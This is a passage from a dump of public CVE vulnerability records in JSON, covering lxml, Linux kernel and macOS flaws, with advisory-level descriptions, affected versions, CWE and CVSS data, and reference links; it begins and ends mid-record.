"x_refsource_MISC" ], "url": "https://advisory.checkmarx.net/advisory/CX-2020-4286" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://security.netapp.com/advisory/ntap-20210521-0003/" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "secalert@redhat.com", "ID": "CVE-2020-27783", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "python-lxml", "version": { "version_data": [ { "version_value": "lxml-4.6.2" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "A XSS vulnerability was discovered in python-lxml\u0027s clean module. The module\u0027s parser didn\u0027t properly imitate browsers, which caused different behaviors between the sanitizer and the user\u0027s page. A remote attacker could exploit this flaw to run arbitrary HTML/JS code." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "CWE-79" } ] } ] }, "references": { "reference_data": [ { "name": "https://bugzilla.redhat.com/show_bug.cgi?id=1901633", "refsource": "MISC", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1901633" }, { "name": "DSA-4810", "refsource": "DEBIAN", "url": "https://www.debian.org/security/2020/dsa-4810" }, { "name": "[debian-lts-announce] 20201218 [SECURITY] [DLA 2467-2] lxml regression update", "refsource": "MLIST", "url": "https://lists.debian.org/debian-lts-announce/2020/12/msg00028.html" }, { "name": "FEDORA-2020-0e055ea503", "refsource": "FEDORA", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TMHVKRUT22LVWNL3TB7HPSDHJT74Q3JK/" }, { "name": "FEDORA-2020-307946cfb6", "refsource": "FEDORA", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JKG67GPGTV23KADT4D4GK4RMHSO4CIQL/" }, { "name": "https://www.oracle.com//security-alerts/cpujul2021.html", "refsource": "MISC", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "name": "https://advisory.checkmarx.net/advisory/CX-2020-4286", "refsource": "MISC", "url": "https://advisory.checkmarx.net/advisory/CX-2020-4286" }, { "name": "https://security.netapp.com/advisory/ntap-20210521-0003/", "refsource": "CONFIRM", "url": "https://security.netapp.com/advisory/ntap-20210521-0003/" } ] } } } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2020-27783", "datePublished": "2020-12-03T16:39:41", "dateReserved": "2020-10-27T00:00:00", "dateUpdated": "2024-08-04T16:25:42.427Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-28328
Vulnerability from cvelistv5
Published
2023-04-19 00:00
Modified
2024-08-02 12:38
Severity ?
EPSS score ?
Summary
A NULL pointer dereference flaw was found in the az6027 driver in drivers/media/usb/dev-usb/az6027.c in the Linux Kernel. The message from user space is not checked properly before transferring into the device. This flaw allows a local user to crash the system or potentially cause a denial of service.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T12:38:24.551Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2177389" }, { "name": "[debian-lts-announce] 20230502 [SECURITY] [DLA 3404-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00005.html" }, { "name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Linux", "vendor": "n/a", "versions": [ { "lessThan": "6.2", "status": "affected", "version": "Linux Kernel prior to kernel 6.2 RC1", "versionType": "custom" } ] } ], "descriptions": [ { "lang": "en", "value": "A NULL pointer dereference flaw was found in the az6027 driver in drivers/media/usb/dev-usb/az6027.c in the Linux Kernel. The message from user space is not checked properly before transferring into the device. This flaw allows a local user to crash the system or potentially cause a denial of service." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-476", "description": "CWE-476", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-07-12T19:06:05.518Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2177389" }, { "name": "[debian-lts-announce] 20230502 [SECURITY] [DLA 3404-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00005.html" }, { "name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-28328", "datePublished": "2023-04-19T00:00:00", "dateReserved": "2023-03-14T00:00:00", "dateUpdated": "2024-08-02T12:38:24.551Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-32360
Vulnerability from cvelistv5
Published
2023-06-23 00:00
Modified
2024-08-02 15:10
Severity ?
EPSS score ?
Summary
An authentication issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.7.7, macOS Monterey 12.6.6, macOS Ventura 13.4. An unauthenticated user may be able to access recently printed documents.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T15:10:24.966Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://support.apple.com/en-us/HT213758" }, { "tags": [ "x_transferred" ], "url": "https://support.apple.com/en-us/HT213759" }, { "tags": [ "x_transferred" ], "url": "https://support.apple.com/en-us/HT213760" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00041.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "macOS", "vendor": "Apple", "versions": [ { "lessThan": "13.4", "status": "affected", "version": "unspecified", "versionType": "custom" } ] }, { "product": "macOS", "vendor": "Apple", "versions": [ { "lessThan": "12.6", "status": "affected", "version": "unspecified", "versionType": "custom" } ] }, { "product": "macOS", "vendor": "Apple", "versions": [ { "lessThan": "11.7", "status": "affected", "version": "unspecified", "versionType": "custom" } ] } ], "descriptions": [ { "lang": "en", "value": "An authentication issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.7.7, macOS Monterey 12.6.6, macOS Ventura 13.4. An unauthenticated user may be able to access recently printed documents." } ], "problemTypes": [ { "descriptions": [ { "description": "An unauthenticated user may be able to access recently printed documents", "lang": "en" } ] } ], "providerMetadata": { "dateUpdated": "2023-07-27T03:47:29.106Z", "orgId": "286789f9-fbc2-4510-9f9a-43facdede74c", "shortName": "apple" }, "references": [ { "url": "https://support.apple.com/en-us/HT213758" }, { "url": "https://support.apple.com/en-us/HT213759" }, { "url": "https://support.apple.com/en-us/HT213760" }, { "url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00041.html" } ] } }, "cveMetadata": { "assignerOrgId": "286789f9-fbc2-4510-9f9a-43facdede74c", "assignerShortName": "apple", "cveId": "CVE-2023-32360", "datePublished": "2023-06-23T00:00:00", "dateReserved": "2023-05-08T00:00:00", "dateUpdated": "2024-08-02T15:10:24.966Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-1838
Vulnerability from cvelistv5
Published
2023-04-05 00:00
Modified
2024-08-02 06:05
Severity ?
EPSS score ?
Summary
A use-after-free flaw was found in vhost_net_set_backend in drivers/vhost/net.c in virtio network subcomponent in the Linux kernel due to a double fget. This flaw could allow a local attacker to crash the system, and could even lead to a kernel information leak problem.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T06:05:26.723Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://lore.kernel.org/netdev/20220516084213.26854-1-jasowang%40redhat.com/T/" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230517-0003/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Kernel", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Linux Kernel prior to kernel 5.18 25" } ] } ], "descriptions": [ { "lang": "en", "value": "A use-after-free flaw was found in vhost_net_set_backend in drivers/vhost/net.c in virtio network subcomponent in the Linux kernel due to a double fget. This flaw could allow a local attacker to crash the system, and could even lead to a kernel information leak problem." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-05-17T00:00:00", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://lore.kernel.org/netdev/20220516084213.26854-1-jasowang%40redhat.com/T/" }, { "url": "https://security.netapp.com/advisory/ntap-20230517-0003/" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-1838", "datePublished": "2023-04-05T00:00:00", "dateReserved": "2023-04-04T00:00:00", "dateUpdated": "2024-08-02T06:05:26.723Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-3212
Vulnerability from cvelistv5
Published
2023-06-23 00:00
Modified
2024-08-02 06:48
Severity ?
EPSS score ?
Summary
A NULL pointer dereference issue was found in the gfs2 file system in the Linux kernel. It occurs on corrupt gfs2 file systems when the evict code tries to reference the journal descriptor structure after it has been freed and set to NULL. A privileged local user could use this flaw to cause a kernel panic.
References
Impacted products
▼ | Vendor | Product |
---|---|---|
n/a | Linux kernel (gfs2 file system) |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T06:48:08.292Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2214348" }, { "tags": [ "x_transferred" ], "url": "https://github.com/torvalds/linux/commit/504a10d9e46bc37b23d0a1ae2f28973c8516e636" }, { "name": "DSA-5448", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.debian.org/security/2023/dsa-5448" }, { "name": "DSA-5480", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.debian.org/security/2023/dsa-5480" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230929-0005/" }, { "name": "[debian-lts-announce] 20231019 [SECURITY] [DLA 3623-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html" }, { "name": "[debian-lts-announce] 20240111 [SECURITY] [DLA 3710-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Linux kernel (gfs2 file system)", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Fixed in kernel 6.4-rc2" } ] } ], "descriptions": [ { "lang": "en", "value": "A NULL pointer dereference issue was found in the gfs2 file system in the Linux kernel. It occurs on corrupt gfs2 file systems when the evict code tries to reference the journal descriptor structure after it has been freed and set to NULL. A privileged local user could use this flaw to cause a kernel panic." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-476", "description": "CWE-476", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-01-11T19:06:22.505410", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2214348" }, { "url": "https://github.com/torvalds/linux/commit/504a10d9e46bc37b23d0a1ae2f28973c8516e636" }, { "name": "DSA-5448", "tags": [ "vendor-advisory" ], "url": "https://www.debian.org/security/2023/dsa-5448" }, { "name": "DSA-5480", "tags": [ "vendor-advisory" ], "url": "https://www.debian.org/security/2023/dsa-5480" }, { "url": "https://security.netapp.com/advisory/ntap-20230929-0005/" }, { "name": "[debian-lts-announce] 20231019 [SECURITY] [DLA 3623-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html" }, { "name": "[debian-lts-announce] 20240111 [SECURITY] [DLA 3710-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-3212", "datePublished": "2023-06-23T00:00:00", "dateReserved": "2023-06-12T00:00:00", "dateUpdated": "2024-08-02T06:48:08.292Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2021-33631
Vulnerability from cvelistv5
Published
2024-01-18 15:05
Modified
2024-08-03 23:58
Severity ?
EPSS score ?
Summary
Kernel crash in EXT4 filesystem
References
{ "containers": { "adp": [ { "metrics": [ { "other": { "content": { "id": "CVE-2021-33631", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-02-21T18:54:33.956367Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-07-23T20:45:02.175Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-03T23:58:21.529Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1030" }, { "tags": [ "x_transferred" ], "url": "https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1031" }, { "tags": [ "x_transferred" ], "url": "https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1032" }, { "tags": [ "x_transferred" ], "url": "https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1033" }, { "tags": [ "x_transferred" ], "url": "https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1034" }, { "tags": [ "x_transferred" ], "url": "https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1035" }, { "tags": [ "x_transferred" ], "url": "https://gitee.com/src-openeuler/kernel/pulls/1389" }, { "tags": [ "x_transferred" ], "url": "https://gitee.com/src-openeuler/kernel/pulls/1396" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=5c099c4fdc438014d5893629e70a8ba934433ee8" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/01/30/3" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/01/30/4" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/01/30/5" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/01/30/9" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/01/30/10" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/01/31/3" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/01/31/2" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/02/02/6" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/02/02/9" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/02/03/1" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "collectionURL": "https://gitee.com/src-openeuler", "defaultStatus": "unaffected", "modules": [ "filesystem" ], "packageName": "kernel", "platforms": [ "Linux" ], "product": "kernel", "programFiles": [ "https://gitee.com/openeuler/kernel/blob/openEuler-22.03-LTS/fs/ext4/inline.c" ], "repo": "https://gitee.com/src-openeuler/kernel", "vendor": "openEuler", "versions": [ { "changes": [ { "at": "cf1d16ea2f1086c0765348344b70aa2361436642 ext4: fix kernel BUG in \u0027ext4_write_inline_data_end()\u0027", "status": "unaffected" } ], "lessThan": "4.19.90-2401.3", "status": "affected", "version": "4.19.90", "versionType": "git" }, { "changes": [ { "at": "1587126a0f2a79b3ee6cb309bbfaf079c39eda29 ext4: fix kernel BUG in \u0027ext4_write_inline_data_end()\u0027", "status": "unaffected" } ], "lessThan": "5.10.0-183.0.0", "status": "affected", "version": "5.10.0-60.18.0", "versionType": "git" } ] } ], "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "Integer Overflow or Wraparound vulnerability in openEuler kernel on Linux (filesystem modules) allows Forced Integer Overflow.\u003cp\u003eThis issue affects openEuler kernel: from 4.19.90 before 4.19.90-2401.3, from 5.10.0-60.18.0 before 5.10.0-183.0.0.\u003c/p\u003e" } ], "value": "Integer Overflow or Wraparound vulnerability in openEuler kernel on Linux (filesystem modules) allows Forced Integer Overflow.This issue affects openEuler kernel: from 4.19.90 before 4.19.90-2401.3, from 5.10.0-60.18.0 before 5.10.0-183.0.0.\n\n" } ], "impacts": [ { "capecId": "CAPEC-92", "descriptions": [ { "lang": "en", "value": "CAPEC-92 Forced Integer Overflow" } ] } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-190", "description": "CWE-190 Integer Overflow or Wraparound", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-01-26T08:11:01.065Z", "orgId": "7e1ac599-2767-43fa-b3ea-f10178cc98f2", "shortName": "openEuler" }, "references": [ { "url": "https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1030" }, { "url": "https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1031" }, { "url": "https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1032" }, { "url": "https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1033" }, { "url": "https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1034" }, { "url": "https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1035" }, { "url": "https://gitee.com/src-openeuler/kernel/pulls/1389" }, { "url": "https://gitee.com/src-openeuler/kernel/pulls/1396" }, { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=5c099c4fdc438014d5893629e70a8ba934433ee8" }, { "url": "http://www.openwall.com/lists/oss-security/2024/01/30/3" }, { "url": "http://www.openwall.com/lists/oss-security/2024/01/30/4" }, { "url": "http://www.openwall.com/lists/oss-security/2024/01/30/5" }, { "url": "http://www.openwall.com/lists/oss-security/2024/01/30/9" }, { "url": "http://www.openwall.com/lists/oss-security/2024/01/30/10" }, { "url": "http://www.openwall.com/lists/oss-security/2024/01/31/3" }, { "url": "http://www.openwall.com/lists/oss-security/2024/01/31/2" }, { "url": "http://www.openwall.com/lists/oss-security/2024/02/02/6" }, { "url": "http://www.openwall.com/lists/oss-security/2024/02/02/9" }, { "url": "http://www.openwall.com/lists/oss-security/2024/02/03/1" } ], "source": { "discovery": "UNKNOWN" }, "title": "Kernel crash in EXT4 filesystem", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "7e1ac599-2767-43fa-b3ea-f10178cc98f2", "assignerShortName": "openEuler", "cveId": "CVE-2021-33631", "datePublished": "2024-01-18T15:05:58.610Z", "dateReserved": "2021-05-28T14:26:05.941Z", "dateUpdated": "2024-08-03T23:58:21.529Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-45884
Vulnerability from cvelistv5
Published
2022-11-25 00:00
Modified
2024-08-03 14:24
Severity ?
EPSS score ?
Summary
An issue was discovered in the Linux kernel through 6.0.9. drivers/media/dvb-core/dvbdev.c has a use-after-free, related to dvb_register_device dynamically allocating fops.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T14:24:03.235Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://lore.kernel.org/linux-media/20221115131822.6640-1-imv4bel%40gmail.com/" }, { "tags": [ "x_transferred" ], "url": "https://lore.kernel.org/linux-media/20221115131822.6640-4-imv4bel%40gmail.com/" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230113-0006/" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=627bb528b086b4136315c25d6a447a98ea9448d3" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "An issue was discovered in the Linux kernel through 6.0.9. drivers/media/dvb-core/dvbdev.c has a use-after-free, related to dvb_register_device dynamically allocating fops." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2024-03-25T00:40:39.847108", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://lore.kernel.org/linux-media/20221115131822.6640-1-imv4bel%40gmail.com/" }, { "url": "https://lore.kernel.org/linux-media/20221115131822.6640-4-imv4bel%40gmail.com/" }, { "url": "https://security.netapp.com/advisory/ntap-20230113-0006/" }, { "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=627bb528b086b4136315c25d6a447a98ea9448d3" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2022-45884", "datePublished": "2022-11-25T00:00:00", "dateReserved": "2022-11-25T00:00:00", "dateUpdated": "2024-08-03T14:24:03.235Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2019-8675
Vulnerability from cvelistv5
Published
2020-10-27 19:39
Modified
2024-08-04 21:24
Severity ?
EPSS score ?
Summary
A buffer overflow issue was addressed with improved memory handling. This issue is fixed in macOS Mojave 10.14.6, Security Update 2019-004 High Sierra, Security Update 2019-004 Sierra. An attacker in a privileged network position may be able to execute arbitrary code.
References
▼ | URL | Tags |
---|---|---|
https://support.apple.com/en-us/HT210348 | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T21:24:29.584Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://support.apple.com/en-us/HT210348" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "macOS", "vendor": "Apple", "versions": [ { "lessThan": "10.14", "status": "affected", "version": "unspecified", "versionType": "custom" } ] } ], "descriptions": [ { "lang": "en", "value": "A buffer overflow issue was addressed with improved memory handling. This issue is fixed in macOS Mojave 10.14.6, Security Update 2019-004 High Sierra, Security Update 2019-004 Sierra. An attacker in a privileged network position may be able to execute arbitrary code." } ], "problemTypes": [ { "descriptions": [ { "description": "An attacker in a privileged network position may be able to execute arbitrary code", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2020-10-27T19:39:09", "orgId": "286789f9-fbc2-4510-9f9a-43facdede74c", "shortName": "apple" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://support.apple.com/en-us/HT210348" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "product-security@apple.com", "ID": "CVE-2019-8675", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "macOS", "version": { "version_data": [ { "version_affected": "\u003c", "version_value": "10.14" } ] } } ] }, "vendor_name": "Apple" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "A buffer overflow issue was addressed with improved memory handling. This issue is fixed in macOS Mojave 10.14.6, Security Update 2019-004 High Sierra, Security Update 2019-004 Sierra. An attacker in a privileged network position may be able to execute arbitrary code." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "An attacker in a privileged network position may be able to execute arbitrary code" } ] } ] }, "references": { "reference_data": [ { "name": "https://support.apple.com/en-us/HT210348", "refsource": "MISC", "url": "https://support.apple.com/en-us/HT210348" } ] } } } }, "cveMetadata": { "assignerOrgId": "286789f9-fbc2-4510-9f9a-43facdede74c", "assignerShortName": "apple", "cveId": "CVE-2019-8675", "datePublished": "2020-10-27T19:39:09", "dateReserved": "2019-02-18T00:00:00", "dateUpdated": "2024-08-04T21:24:29.584Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-2176
Vulnerability from cvelistv5
Published
2023-04-20 00:00
Modified
2024-08-02 06:12
Severity ?
EPSS score ?
Summary
A vulnerability was found in compare_netdev_and_ip in drivers/infiniband/core/cma.c in RDMA in the Linux Kernel. The improper cleanup results in out-of-boundary read, where a local user can utilize this problem to crash the system or escalation of privilege.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T06:12:20.598Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://www.spinics.net/lists/linux-rdma/msg114749.html" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230609-0005/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Kernel", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Linux 6.1" } ] } ], "descriptions": [ { "lang": "en", "value": "A vulnerability was found in compare_netdev_and_ip in drivers/infiniband/core/cma.c in RDMA in the Linux Kernel. The improper cleanup results in out-of-boundary read, where a local user can utilize this problem to crash the system or escalation of privilege." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-125", "description": "CWE-125", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-06-09T00:00:00", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://www.spinics.net/lists/linux-rdma/msg114749.html" }, { "url": "https://security.netapp.com/advisory/ntap-20230609-0005/" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-2176", "datePublished": "2023-04-20T00:00:00", "dateReserved": "2023-04-19T00:00:00", "dateUpdated": "2024-08-02T06:12:20.598Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-3640
Vulnerability from cvelistv5
Published
2022-10-21 00:00
Modified
2024-08-03 01:14
Severity ?
EPSS score ?
Summary
Linux Kernel Bluetooth l2cap_core.c l2cap_conn_del use after free
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T01:14:03.216Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bluetooth/bluetooth-next.git/commit/?id=42cf46dea905a80f6de218e837ba4d4cc33d6979" }, { "tags": [ "x_transferred" ], "url": "https://vuldb.com/?id.211944" }, { "name": "FEDORA-2022-64ab9153c0", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OD7VWUT7YAU4CJ247IF44NGVOAODAJGC/" }, { "name": "FEDORA-2022-65a0a3504a", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/DGOIRR72OAFE53XZRUDZDP7INGLIC3E3/" }, { "name": "FEDORA-2022-7aadaadebc", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XG2UPX3MQ7RKRJEUMGEH2TLPKZJCBU5C/" }, { "name": "[debian-lts-announce] 20221222 [SECURITY] [DLA 3244-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00031.html" }, { "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Kernel", "vendor": 